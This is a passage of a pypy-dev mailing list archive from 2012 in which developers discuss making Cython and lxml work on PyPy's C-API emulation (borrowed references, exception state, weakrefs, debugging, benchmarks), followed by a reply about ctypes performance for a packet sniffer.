> > Here are the changes I made, some parts are really hacks and should be > polished: > lxml: http://paste.pocoo.org/show/552903/ > cython: http://paste.pocoo.org/show/552904/ The exception handling code that you deleted in __Pyx_GetException(), that which accesses exc_type and friends, is actually needed for correct semantics of Cython code and Python code. Basically, it implements the part of the except clause that moves the hot exception into sys.exc_info(). This equally applies to __Pyx_ExceptionSave() and __Pyx_ExceptionReset(), which form something like an exception backup frame around code sections that may raise exceptions themselves but must otherwise not touch the current exception. Specifically, as part of the finally clause. In order to fix this, is there a way to store away and restore the current sys.exc_info() in PyPy? Stefan From amauryfa at gmail.com Sat Feb 18 14:45:31 2012 From: amauryfa at gmail.com (Amaury Forgeot d'Arc) Date: Sat, 18 Feb 2012 14:45:31 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: 2012/2/18 Stefan Behnel > The weakref changes are really unfortunate as they appear in one of the > most performance critical spots of lxml's API: on-the-fly proxy creation. > > I can understand why the original code won't work as is, but could you > elaborate on why the weak references are needed? Maybe there is a faster > way of doing this? > PyObject->ob_refcnt only counts the number of PyObject references to the object, not eventual references held by other parts of the pypy interpreter. For example, PyTuple_GetItem() often returns something with refcnt=1; Two calls to "PyObject *x = PyTuple_GetItem(tuple, 0); Py_DECREF(x);" will return different values for the x pointer. But this model has issues with borrowed references. 
For example, this code is valid CPython, but will crash with cpyext:

    PyObject *exc = PyErr_NewException("error", PyExc_StandardError, NULL);
    PyDict_SetItemString(module_dict, "error", exc);
    Py_DECREF(exc);
    // exc is now a borrowed reference, but the following line crashes pypy:
    PyObject *another = PyErr_NewException("AnotherError", exc, NULL);
    PyDict_SetItemString(module_dict, "AnotherError", another);
    Py_DECREF(exc);

In CPython, the code can continue using the created object: we don't own the reference, exc is now a borrowed reference, valid as long as the containing dict is valid; the refcount is 1 when the object is created, incremented when PyDict_SetItem stores it, and 1 again after DECREF. PyPy does it differently: a dictionary does not store PyObject* pointers, but "pypy objects" with no reference counting, and whose address can change with a gc collection. PyDict_SetItemString will not change exc->refcnt, which will remain 1, then Py_DECREF will free the memory pointed to by exc. There are mechanisms to keep the reference a bit longer, for example PyTuple_GET_ITEM will return a "temporary" reference that will be released when the tuple loses its last cpyext reference. Another way to say this is that with cpyext, a borrowed reference has to borrow from some other reference that you own. It can be a container, or in some cases the current "context", i.e. something that has the duration of the current C call. Otherwise, weak references must be used instead. -- Amaury Forgeot d'Arc -------------- next part -------------- An HTML attachment was scrubbed...
URL: From amauryfa at gmail.com Sat Feb 18 14:52:30 2012 From: amauryfa at gmail.com (Amaury Forgeot d'Arc) Date: Sat, 18 Feb 2012 14:52:30 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: 2012/2/18 Stefan Behnel > The exception handling code that you deleted in __Pyx_GetException(), that > which accesses exc_type and friends, is actually needed for correct > semantics of Cython code and Python code. Basically, it implements the part > of the except clause that moves the hot exception into sys.exc_info(). > > This equally applies to __Pyx_ExceptionSave() and __Pyx_ExceptionReset(), > which form something like an exception backup frame around code sections > that may raise exceptions themselves but must otherwise not touch the > current exception. Specifically, as part of the finally clause. > > In order to fix this, is there a way to store away and restore the current > sys.exc_info() in PyPy? > I certainly was a bit fast to remove code there, and these exc_value and curexc_value have always been a delicate part of the CPython interpreter. One thing I don't understand for example, is why Cython needs to deal with sys.exc_info, when no other extension uses it for exception management. The only way to know for sure is to have unit tests with different use cases. -- Amaury Forgeot d'Arc -------------- next part -------------- An HTML attachment was scrubbed... URL: From stefan_ml at behnel.de Sat Feb 18 15:10:49 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sat, 18 Feb 2012 15:10:49 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Amaury Forgeot d'Arc, 18.02.2012 14:52: > 2012/2/18 Stefan Behnel > >> The exception handling code that you deleted in __Pyx_GetException(), that >> which accesses exc_type and friends, is actually needed for correct >> semantics of Cython code and Python code. 
>> Basically, it implements the part >> of the except clause that moves the hot exception into sys.exc_info(). >> >> This equally applies to __Pyx_ExceptionSave() and __Pyx_ExceptionReset(), >> which form something like an exception backup frame around code sections >> that may raise exceptions themselves but must otherwise not touch the >> current exception. Specifically, as part of the finally clause. >> >> In order to fix this, is there a way to store away and restore the current >> sys.exc_info() in PyPy? >> > > I certainly was a bit fast to remove code there, and these > exc_value and curexc_value have always been a delicate > part of the CPython interpreter. > > One thing I don't understand for example, is why Cython needs to deal with > sys.exc_info, when no other extension uses it for exception management. Here's an example.

Python code:

    def print_excinfo():
        print(sys.exc_info())

Cython code:

    from stuff import print_excinfo

    try:
        raise TypeError
    except TypeError:
        print_excinfo()

With the code removed, Cython will not store the TypeError in sys.exc_info(), so the Python code cannot see it. This may seem like an unimportant use case (who uses sys.exc_info() anyway, right?), but this becomes very visible when the code that uses sys.exc_info() is not user code but CPython itself, e.g. when raising another exception or when inspecting frames. Things grow really bad here, especially in Python 3. > The only way to know for sure is to have unit tests with different use > cases. Cython has loads of those in its test suite, as you can imagine. These things are so tricky to get right that it's futile to even try without growing a substantial test base of weird corner cases.
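[Editor's note: the behaviour Stefan's example relies on can be checked in pure Python — while an except block is running, a function called from it must see the in-flight exception through sys.exc_info(). The name get_excinfo below is a stand-in for the print_excinfo of the example.]

```python
# Inside an except block, sys.exc_info() reflects the exception being
# handled, even from a callee several frames down. This is the contract
# that Cython's __Pyx_GetException() code has to preserve.
import sys

def get_excinfo():
    return sys.exc_info()

try:
    raise TypeError("demo")
except TypeError:
    etype, evalue, tb = get_excinfo()

assert etype is TypeError
assert isinstance(evalue, TypeError)
```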
Stefan From amauryfa at gmail.com Sat Feb 18 15:18:30 2012 From: amauryfa at gmail.com (Amaury Forgeot d'Arc) Date: Sat, 18 Feb 2012 15:18:30 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: 2012/2/18 Stefan Behnel > I couldn't find the PyWeakref_LockObject() function anywhere. That's a > PyPy-only thing, right? I aliased it to (NULL) when compiling for CPython. > Yes, this function is PyPy-only, to fix a flaw of PyWeakref_GetObject: it returns a borrowed reference, which is very dangerous because the object can disappear anytime: with a garbage collection, or another thread... Fortunately the GIL is here to protect you, but the only sane thing to do is to quickly INCREF the returned reference. PyWeakref_LockObject directly returns a new reference. In PyPy, the behavior of PyWeakref_GetObject is even worse: to avoid returning a refcount of zero, the returned reference is attached to the weakref, effectively turning it into a strong reference! I now realize that this was written before we implemented the "temporary container" for borrowed references: PyWeakref_GetObject() could return a reference valid for the duration of the current C call. -- Amaury Forgeot d'Arc -------------- next part -------------- An HTML attachment was scrubbed... URL: From stefan_ml at behnel.de Sat Feb 18 15:23:32 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sat, 18 Feb 2012 15:23:32 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Amaury Forgeot d'Arc, 18.02.2012 15:18: > 2012/2/18 Stefan Behnel > >> I couldn't find the PyWeakref_LockObject() function anywhere. That's a >> PyPy-only thing, right? I aliased it to (NULL) when compiling for CPython. 
>> > > Yes, this function is PyPy-only, to fix a flaw of PyWeakref_GetObject: > it returns a borrowed reference, which is very dangerous because the object > can disappear anytime: with a garbage collection, or another thread... > Fortunately the GIL is here to protect you, but the only sane thing to do > is to quickly INCREF the returned reference. > PyWeakref_LockObject directly returns a new reference. > > In PyPy, the behavior of PyWeakref_GetObject is even worse: > to avoid returning a refcount of zero, the returned reference is attached > to the weakref, effectively turning it into a strong reference! > I now realize that this was written before we implemented the > "temporary container" for borrowed references: PyWeakref_GetObject() > could return a reference valid for the duration of the current C call. Do you mean that you could actually fix this in PyPy so that lxml won't have to use that function? Or would it still have to use it, because the references are stored away and thus become long-living? (i.e. longer than the C call) Stefan From amauryfa at gmail.com Sat Feb 18 15:41:42 2012 From: amauryfa at gmail.com (Amaury Forgeot d'Arc) Date: Sat, 18 Feb 2012 15:41:42 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: 2012/2/18 Stefan Behnel > Here's an example. > > Python code: > > def print_excinfo(): > print(sys.exc_info()) > > Cython code: > > from stuff import print_excinfo > > try: > raise TypeError > except TypeError: > print_excinfo() > > With the code removed, Cython will not store the TypeError in > sys.exc_info(), so the Python code cannot see it. This may seem like an > unimportant use case (who uses sys.exc_info() anyway, right?), but this > becomes very visible when the code that uses sys.exc_info() is not user > code but CPython itself, e.g. when raising another exception or when > inspecting frames. Things grow really bad here, especially in Python 3. 
> I think I understand now, thanks for your example. Things are a bit simpler in PyPy because these exceptions are stored in the frame that is currently handling it. At least better than CPython which stores it in one place, and has to somehow save the state of the previous frames. Did you consider adding such a function to CPython? "PyErr_SetCurrentFrameExceptionInfo"? For the record, pypy could implement it as: space.getexecutioncontext().gettopframe_nohidden().last_exception = operationerr i.e. the thing returned by sys.exc_info(). -- Amaury Forgeot d'Arc -------------- next part -------------- An HTML attachment was scrubbed... URL: From stefan_ml at behnel.de Sat Feb 18 16:29:43 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sat, 18 Feb 2012 16:29:43 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Stefan Behnel, 18.02.2012 09:48: > Once we have the test suite runnable, we can set up a PyPy instance on our > CI server to get feed-back on any advances. > > https://sage.math.washington.edu:8091/hudson/ I've set up a build job for my development branch here: https://sage.math.washington.edu:8091/hudson/job/cython-scoder-pypy-nightly/ It builds and tests against the latest PyPy-c-jit nightly build, so that we get timely feedback for changes on either side. When is a good time to download the latest nightly build, BTW? Stefan From stefan_ml at behnel.de Sat Feb 18 17:46:09 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sat, 18 Feb 2012 17:46:09 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Stefan Behnel, 18.02.2012 16:29: > Stefan Behnel, 18.02.2012 09:48: >> Once we have the test suite runnable, we can set up a PyPy instance on our >> CI server to get feed-back on any advances. 
>> >> https://sage.math.washington.edu:8091/hudson/ > > I've set up a build job for my development branch here: > > https://sage.math.washington.edu:8091/hudson/job/cython-scoder-pypy-nightly/ > > It builds and tests against the latest PyPy-c-jit nightly build, so that we > get timely feedback for changes on either side. And now the question is: how do I debug into PyPy? From the nightly build, I don't get any debugging symbols in gdb, just a useless list of call addresses (running the ref-counting related "arg_incref" test here):

"""
#0  0x0000000000ef93ef in ?? ()
#1  0x0000000000fca0cb in PyDict_Next ()
#2  0x00007f2564be8f6c in __pyx_pf_10arg_incref_f () from /levi/scratch/robertwb/hudson/hudson/jobs/cython-scoder-pypy-nightly/workspace/BUILD/run/c/arg_incref.pypy-18.so
#3  0x00007f2564be8dd3 in __pyx_pw_10arg_incref_1f () from /levi/scratch/robertwb/hudson/hudson/jobs/cython-scoder-pypy-nightly/workspace/BUILD/run/c/arg_incref.pypy-18.so
#4  0x000000000109e375 in ?? ()
#5  0x00000000010026e4 in ?? ()
[a couple of hundred more skipped that look like the two above]
"""

Aren't debugging symbols enabled for the nightly builds or is this what PyPy's JIT gives you? I used this file: http://buildbot.pypy.org/nightly/trunk/pypy-c-jit-latest-linux64.tar.bz2 And I guess source-level debugging isn't really available for the 37MB pypy file either, is it? BTW, I've also run into a problem with distutils under PyPy. The value of the CFLAGS environment variable is not being split into separate options so that gcc complains about "-O" not accepting the value "0 -ggdb -fPIC" when I pass CFLAGS="-O0 -ggdb -fPIC". So I can currently only pass a single CFLAGS option (my choice obviously being "-ggdb").
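[Editor's note: the CFLAGS problem described above comes down to the environment variable holding one string that must be split into separate compiler arguments before being appended to the gcc command line; passed unsplit, gcc parses "-O" with the bogus value "0 -ggdb -fPIC". A whitespace split covers the reported case, and shlex.split() additionally copes with quoted values. This is only a sketch of the needed behaviour, not the actual distutils fix.]

```python
# Splitting a CFLAGS-style string into separate compiler arguments.
import shlex

cflags = "-O0 -ggdb -fPIC"
assert cflags.split() == ["-O0", "-ggdb", "-fPIC"]

# shlex also keeps quoted values together, which a plain split() would break:
assert shlex.split('-O0 -DNAME="two words"') == ["-O0", "-DNAME=two words"]
```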
Stefan From faassen at startifact.com Sat Feb 18 18:48:47 2012 From: faassen at startifact.com (Martijn Faassen) Date: Sat, 18 Feb 2012 18:48:47 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Hey, On Sat, Feb 18, 2012 at 11:20 AM, Stefan Behnel wrote: > Amaury Forgeot d'Arc, 18.02.2012 10:08: >> I made some modifications to pypy, cython and lxml, >> and now I can compile and install cython, lxml, and they seem to work! >> >> For example:: >>     html = etree.Element("html") >>     body = etree.SubElement(html, "body") >>     body.text = "TEXT" >>     br = etree.SubElement(body, "br") >>     br.tail = "TAIL" >>     html.xpath("//text()") >> >> Here are the changes I made, some parts are really hacks and should be >> polished: >> lxml: http://paste.pocoo.org/show/552903/ > > The weakref changes are really unfortunate as they appear in one of the > most performance critical spots of lxml's API: on-the-fly proxy creation. In fact I remember using weak references in early versions of lxml, and getting rid of them at the time sped things up a lot. Regards, Martijn From amauryfa at gmail.com Sat Feb 18 21:20:58 2012 From: amauryfa at gmail.com (Amaury Forgeot d'Arc) Date: Sat, 18 Feb 2012 21:20:58 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: 2012/2/18 Stefan Behnel > And now the question is: how do I debug into PyPy? From the nightly build, > I don't get any debugging symbols in gdb, just a useless list of call > addresses (running the ref-counting related "arg_incref" test here): > > """ > #0 0x0000000000ef93ef in ?? () > #1 0x0000000000fca0cb in PyDict_Next () > This one I know: It's a bug in our implementation of PyDict_Next() that I fixed today with 568fc4237bf8: http://mail.python.org/pipermail/pypy-commit/2012-February/059826.html -- Amaury Forgeot d'Arc -------------- next part -------------- An HTML attachment was scrubbed...
URL: From stefan_ml at behnel.de Sat Feb 18 21:24:28 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sat, 18 Feb 2012 21:24:28 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Amaury Forgeot d'Arc, 18.02.2012 21:20: > 2012/2/18 Stefan Behnel > >> And now the question is: how do I debug into PyPy? From the nightly build, >> I don't get any debugging symbols in gdb, just a useless list of call >> addresses (running the ref-counting related "arg_incref" test here): >> >> """ >> #0 0x0000000000ef93ef in ?? () >> #1 0x0000000000fca0cb in PyDict_Next () >> > > This one I know: > It's a bug in our implementation of PyDict_Next() that I fixed > today with 568fc4237bf8: > http://mail.python.org/pipermail/pypy-commit/2012-February/059826.html Cool, thanks! We'll see the result on the next run then. Sounds like Cython's test suite could prove to be a rather good test harness for PyPy as well. Stefan From alex.gaynor at gmail.com Sat Feb 18 21:31:29 2012 From: alex.gaynor at gmail.com (Alex Gaynor) Date: Sat, 18 Feb 2012 15:31:29 -0500 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: On Sat, Feb 18, 2012 at 3:24 PM, Stefan Behnel wrote: > Amaury Forgeot d'Arc, 18.02.2012 21:20: > > 2012/2/18 Stefan Behnel > > > >> And now the question is: how do I debug into PyPy? From the nightly > build, > >> I don't get any debugging symbols in gdb, just a useless list of call > >> addresses (running the ref-counting related "arg_incref" test here): > >> > >> """ > >> #0 0x0000000000ef93ef in ?? () > >> #1 0x0000000000fca0cb in PyDict_Next () > >> > > > > This one I know: > > It's a bug in our implementation of PyDict_Next() that I fixed > > today with 568fc4237bf8: > > http://mail.python.org/pipermail/pypy-commit/2012-February/059826.html > > Cool, thanks! We'll see the result on the next run then. 
> > Sounds like Cython's test suite could prove to be a rather good test > harness for PyPy as well. > > Stefan > > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev > Yes, ATM our cpyext test suite is basically built by reading the docs and writing our own tests. Unlike the rest of our test suite which draws from the CPython test suite, and bugs found by the great many Python programs (Django and SQLAlchemy in particular have a long history of finding bugs in every single nook and cranny). Alex -- "I disapprove of what you say, but I will defend to the death your right to say it." -- Evelyn Beatrice Hall (summarizing Voltaire) "The people's good is the highest law." -- Cicero -------------- next part -------------- An HTML attachment was scrubbed... URL: From amauryfa at gmail.com Sat Feb 18 21:46:32 2012 From: amauryfa at gmail.com (Amaury Forgeot d'Arc) Date: Sat, 18 Feb 2012 21:46:32 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: 2012/2/18 Stefan Behnel > And now the question is: how do I debug into PyPy? Part of the answer: I never debug pypy. Even with debug symbols, the (generated) code is so complex that most of the time you cannot get anything interesting beyond the function names. But pypy is written in RPython, which can run on top of CPython. Even the cpyext layer can be interpreted; when the extension module calls PyDict_Next(), it actually steps into cpyext/dictobject.py! And it's really fun to add print statements, conditional breakpoints, etc. and experiment with the code without retranslating everything. -- Amaury Forgeot d'Arc -------------- next part -------------- An HTML attachment was scrubbed... 
URL: From stefan_ml at behnel.de Sun Feb 19 11:40:04 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sun, 19 Feb 2012 11:40:04 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Amaury Forgeot d'Arc, 18.02.2012 15:41: > 2012/2/18 Stefan Behnel >> Here's an example. >> >> Python code: >> >> def print_excinfo(): >> print(sys.exc_info()) >> >> Cython code: >> >> from stuff import print_excinfo >> >> try: >> raise TypeError >> except TypeError: >> print_excinfo() >> >> With the code removed, Cython will not store the TypeError in >> sys.exc_info(), so the Python code cannot see it. This may seem like an >> unimportant use case (who uses sys.exc_info() anyway, right?), but this >> becomes very visible when the code that uses sys.exc_info() is not user >> code but CPython itself, e.g. when raising another exception or when >> inspecting frames. Things grow really bad here, especially in Python 3. > > I think I understand now, thanks for your example. > Things are a bit simpler in PyPy because these exceptions are > stored in the frame that is currently handling it. At least better than > CPython > which stores it in one place, and has to somehow save the state of the > previous frames. > Did you consider adding such a function to CPython? > "PyErr_SetCurrentFrameExceptionInfo"? We need read/write access and also swap the exception with another one in some places (lacking a dedicated frame for generators, for example), that makes it two functions at least. CPython and its hand-written extensions won't have much use for this, so the only reason to add this would be to make PyPy (and maybe others) happier when running Cython extensions. I'll ask, although I wouldn't mind using a dedicated PyPy API for this. > For the record, pypy could implement it as: > space.getexecutioncontext().gettopframe_nohidden().last_exception = > operationerr > i.e. the thing returned by sys.exc_info(). 
I imagine that even if there is a way to do this from C code in PyPy, it would be too inefficient for something as common as exception handling. Stefan From stefan_ml at behnel.de Sun Feb 19 12:10:37 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sun, 19 Feb 2012 12:10:37 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Amaury Forgeot d'Arc, 18.02.2012 21:20: > 2012/2/18 Stefan Behnel > >> And now the question is: how do I debug into PyPy? From the nightly build, >> I don't get any debugging symbols in gdb, just a useless list of call >> addresses (running the ref-counting related "arg_incref" test here): >> >> """ >> #0 0x0000000000ef93ef in ?? () >> #1 0x0000000000fca0cb in PyDict_Next () >> > > This one I know: > It's a bug in our implementation of PyDict_Next() that I fixed > today with 568fc4237bf8: > http://mail.python.org/pipermail/pypy-commit/2012-February/059826.html It passes this test now. https://sage.math.washington.edu:8091/hudson/view/dev-scoder/job/cython-scoder-pypy-nightly/9/console After continuing a bit, it next crashes in the "builtin_abs" test. The code in this test grabs a reference to the "__builtins__" module at the start of the module init code and stores it in a static variable. Then, in a test function, it tries to get the "abs" function from it, and that crashes PyPy in the PyObject_GetAttr() call. In gdb, it looks like the module got corrupted somehow, at least its ob_type reference points to dead memory. Could this be another one of those borrowed reference issues? The module reference is retrieved using PyImport_AddModule(), which returns a borrowed reference. Some more errors that I see in the logs up to that point, which all hint at missing bits of the C-API implementation: specialfloatvals.c:490: error: 'Py_HUGE_VAL' undeclared autotestdict_cdef.c:2087: error: 'PyWrapperDescrObject' undeclared bufaccess.c:22714: error: 'PyBoolObject' 
undeclared bufaccess.c:22715: error: 'PyComplexObject' undeclared buffmt.c:2589: warning: implicit declaration of function 'PyUnicode_Replace' Stefan From amauryfa at gmail.com Sun Feb 19 18:04:10 2012 From: amauryfa at gmail.com (Amaury Forgeot d'Arc) Date: Sun, 19 Feb 2012 18:04:10 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: 2012/2/19 Stefan Behnel > bufaccess.c:22714: error: 'PyBoolObject' undeclared > > bufaccess.c:22715: error: 'PyComplexObject' undeclared > Why are these structures needed? Would Cython allow them to be only aliases to PyObject? -- Amaury Forgeot d'Arc -------------- next part -------------- An HTML attachment was scrubbed... URL: From stefan_ml at behnel.de Sun Feb 19 21:55:08 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sun, 19 Feb 2012 21:55:08 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Stefan Behnel, 18.02.2012 11:20: > Amaury Forgeot d'Arc, 18.02.2012 10:08: >> I made some modifications to pypy, cython and lxml, >> and now I can compile and install cython, lxml, and they seem to work! >> >> For example:: >> html = etree.Element("html") >> body = etree.SubElement(html, "body") >> body.text = "TEXT" >> br = etree.SubElement(body, "br") >> br.tail = "TAIL" >> html.xpath("//text()") >> >> Here are the changes I made, some parts are really hacks and should be >> polished: >> lxml: http://paste.pocoo.org/show/552903/ > > The weakref changes are really unfortunate as they appear in one of the > most performance critical spots of lxml's API: on-the-fly proxy creation. To give an idea of how much overhead there is, here's a micro-benchmark. 
First, parsing: $ python2.7 -m timeit -s 'import lxml.etree as et' \ 'et.parse("input3.xml")' 10 loops, best of 3: 136 msec per loop $ pypy -m timeit -s 'import lxml.etree as et' \ 'et.parse("input3.xml")' 10 loops, best of 3: 127 msec per loop I have no idea why pypy is faster here - there really isn't any interaction with the core during XML parsing, certainly nothing that would account for some 7% of the runtime. Maybe some kind of building, benchmarking or whatever fault on my side. Anyway, parsing is clearly in the same ballpark for both. However, when it comes to element proxy instantiation (collecting all elements in the XML tree here as a worst-case example), there is a clear disadvantage for PyPy: $ python2.7 -m timeit -s 'import lxml.etree as et; \ el=et.parse("input3.xml").getroot()' 'list(el.iter())' 10 loops, best of 3: 84 msec per loop $ pypy -m timeit -s 'import lxml.etree as et; \ el=et.parse("input3.xml").getroot()' 'list(el.iter())' 10 loops, best of 3: 1.29 sec per loop That's about the same factor of 15 that you got. This may or may not matter to applications, though, because there are many tools in lxml that allow users to be very selective about which proxies they want to see instantiated, and to otherwise let a lot of functionality execute in C. So applications may get away with a performance hit below that factor in practice. What certainly matters for applications is to get the feature set of lxml within PyPy. Stefan From stefan_ml at behnel.de Sun Feb 19 22:06:08 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sun, 19 Feb 2012 22:06:08 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Amaury Forgeot d'Arc, 19.02.2012 18:04: > 2012/2/19 Stefan Behnel >> bufaccess.c:22714: error: ?PyBoolObject? undeclared >> >> bufaccess.c:22715: error: ?PyComplexObject? undeclared > > Why are these structures needed? Would Cython allow them to be > only aliases to PyObject? 
Not sure about the PyBoolObject. It's being referenced in the module setup code of the test module above, but doesn't seem to be used at all after that. Looks like a bug to me. I agree that PyBoolObject doesn't actually provide anything useful. That's different for PyComplexObject, which allows direct unboxed access to the real and imaginary number fields. Cython makes use of that for interfacing between C/C++ complex and Python complex. Regarding the PyWrapperDescrObject which I also mentioned in my last mail, I noticed that you already had a work-around for that in your initial patch. I'll see if I can get that implemented in a cleaner way (should be done at C compile time). Stefan From amauryfa at gmail.com Sun Feb 19 23:10:37 2012 From: amauryfa at gmail.com (Amaury Forgeot d'Arc) Date: Sun, 19 Feb 2012 23:10:37 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: 2012/2/19 Stefan Behnel > That's different for PyComplexObject, which allows direct unboxed access to > the real and imaginary number fields. Cython makes use of that for > interfacing between C/C++ complex and Python complex. > Why don't you use PyComplex_AsCComplex or other similar API for this? -- Amaury Forgeot d'Arc -------------- next part -------------- An HTML attachment was scrubbed... URL: From stefan_ml at behnel.de Mon Feb 20 09:05:06 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Mon, 20 Feb 2012 09:05:06 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Amaury Forgeot d'Arc, 19.02.2012 23:10: > 2012/2/19 Stefan Behnel > >> That's different for PyComplexObject, which allows direct unboxed access to >> the real and imaginary number fields. Cython makes use of that for >> interfacing between C/C++ complex and Python complex. > > Why don't you use PyComplex_AsCComplex or other similar API for this? 
You are right, there is really just one mention of that in the code base, so it's easy to fix for non-CPython. Doing this, I noticed a bug in the standard declarations of CPython's C-API that Cython ships for user code, which leads to an accidental and useless reference to PyBoolObject and PyComplexObject in the generated modules. I'll find a way to fix those, too, so don't worry about them. Stefan From anto.cuni at gmail.com Mon Feb 20 12:05:38 2012 From: anto.cuni at gmail.com (Antonio Cuni) Date: Mon, 20 Feb 2012 12:05:38 +0100 Subject: [pypy-dev] ctypes - PyPy 1.8 slower than Python 2.6.5 In-Reply-To: References: Message-ID: <4F422902.5030106@gmail.com> Hello Sébastien, I worked a bit on the pypy implementation of ctypes today, and now it is possible to pass ctypes arrays as parameters without leaving the fast path. The benchmark is still slower on PyPy, but not as much as before. Here are the results on my machine for running arp.py: cpython 2.7.2: 224 ms pypy-c 1.8: 1059 ms pypy-c trunk: 696 ms so, we are about 50% faster than before, although still slower than CPython. However, 224 ms is definitely too short for the JIT to warm up, so it would be nice if you could rerun the benchmark with a larger capture file. It's not necessary to retranslate pypy: you can just download pypy 1.8 and put the binary inside an updated copy of the mercurial repo (the relevant checkin is 6566e81c76a8). thank you! ciao, Anto On 02/13/2012 01:33 PM, Sébastien Volle wrote: > Hi all, > > My team is working on a project of fast packet sniffers and I'm comparing > performance between different languages. > So, we came up with a simple ARP sniffer that I ported to Python using ctypes. > > During my investigations, it turned out that using ctypes, PyPy 1.8 is > 4x slower than CPython 2.6.5. > After looking at the PyPy buglist, it seems there are a couple of open issues > about ctypes so I figured I would ask you guys first before filing a new bug. 
> > I'm pretty new to ctypes and pypy so I'm not sure I understand what's going. > My program seems to spend a lot of time in ctypes/function.py:_convert_args > though, has the following profile trace demonstrates: > > $ pypy -m cProfile -s time arp.py > Packet buffer now at 0x9CCECB2 > Capture started > elapsed time : 3983.84ms > Total packets : 35571 > packets/s : 8928.81 > > 7839198 function calls (7838340 primitive calls) in 4.105 seconds > > Ordered by: internal time > > ncalls tottime percall cumtime percall filename:lineno(function) > 69876 0.546 0.000 1.584 0.000 function.py:480(_convert_args) > 214696 0.256 0.000 0.429 0.000 structure.py:236(_subarray) > 1052195 0.206 0.000 0.206 0.000 {isinstance} > 632437 0.192 0.000 0.192 0.000 {method 'append' of 'list' objects} > 175326 0.187 0.000 0.407 0.000 function.py:350(_call_funcptr) > 1 0.173 0.173 4.105 4.105 arp.py:1() > 209628 0.158 0.000 0.587 0.000 primitive.py:272(from_param) > 214696 0.149 0.000 0.963 0.000 structure.py:90(__get__) > 71144 0.143 0.000 0.198 0.000 structure.py:216(__new__) > 106713 0.130 0.000 0.208 0.000 array.py:70(_CData_output) > 105450 0.124 0.000 2.281 0.000 function.py:689(__call__) > 69876 0.123 0.000 1.943 0.000 function.py:278(__call__) > 321412 0.102 0.000 0.102 0.000 {method 'fromaddress' of > 'Array' objects} > 209628 0.088 0.000 0.811 0.000 function.py:437(_conv_param) > 179125 0.083 0.000 0.083 0.000 {method 'fieldaddress' of > 'StructureInstance' objects} > 69883 0.080 0.000 0.122 0.000 primitive.py:308(__init__) > 71142 0.076 0.000 0.320 0.000 structure.py:174(from_address) > 105450 0.075 0.000 0.145 0.000 function.py:593(_build_result) > 139755 0.072 0.000 0.120 0.000 > primitive.py:64(generic_xxx_p_from_param) > 107983 0.070 0.000 0.125 0.000 basics.py:60(_CData_output) > 209828 0.062 0.000 0.062 0.000 {method 'get' of 'dict' objects} > 107986 0.055 0.000 0.055 0.000 {method '__new__' of > '_ctypes.primitive.SimpleType' objects} > 71142 0.052 0.000 0.372 0.000 
pointer.py:77(getcontents) > 35578 0.052 0.000 0.125 0.000 pointer.py:62(__init__) > 35576 0.050 0.000 0.062 0.000 pointer.py:83(setcontents) > 106713 0.047 0.000 0.047 0.000 {method '__new__' of > '_ctypes.array.ArrayMeta' objects} > 139750 0.043 0.000 0.181 0.000 primitive.py:84(from_param_void_p) > 209625 0.043 0.000 0.691 0.000 basics.py:50(get_ffi_param) > 283592/283435 0.041 0.000 0.041 0.000 {len} > 71144 0.040 0.000 0.040 0.000 {method '__new__' of > '_ctypes.structure.StructOrUnionMeta' objects} > 105450 0.039 0.000 0.039 0.000 {method 'free_temp_buffers' of > '_ffi.FuncPtr' objects} > 176683 0.037 0.000 0.037 0.000 {hasattr} > 35571 0.037 0.000 0.423 0.000 pcap.py:89(next) > > > Anyway, I attached my full project to this mail, including a sample pcap > capture file. It requires libpcap to be installed on your system. Run arp.py > to run the sniffer on the included demo.pcap capture file. > I realize I should try and narrow down the issue some more, but I can't really > afford to spend too much time on this right now so hopefully, this will be at > least a bit helpful. > > Thanks! > > Regards, > Sébastien > > > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev From arigo at tunes.org Mon Feb 20 12:21:06 2012 From: arigo at tunes.org (Armin Rigo) Date: Mon, 20 Feb 2012 12:21:06 +0100 Subject: [pypy-dev] STM status In-Reply-To: References: Message-ID: Hi all, An update: now we can translate "--stm -O2", with a twist (the method cache is disabled), and the timings 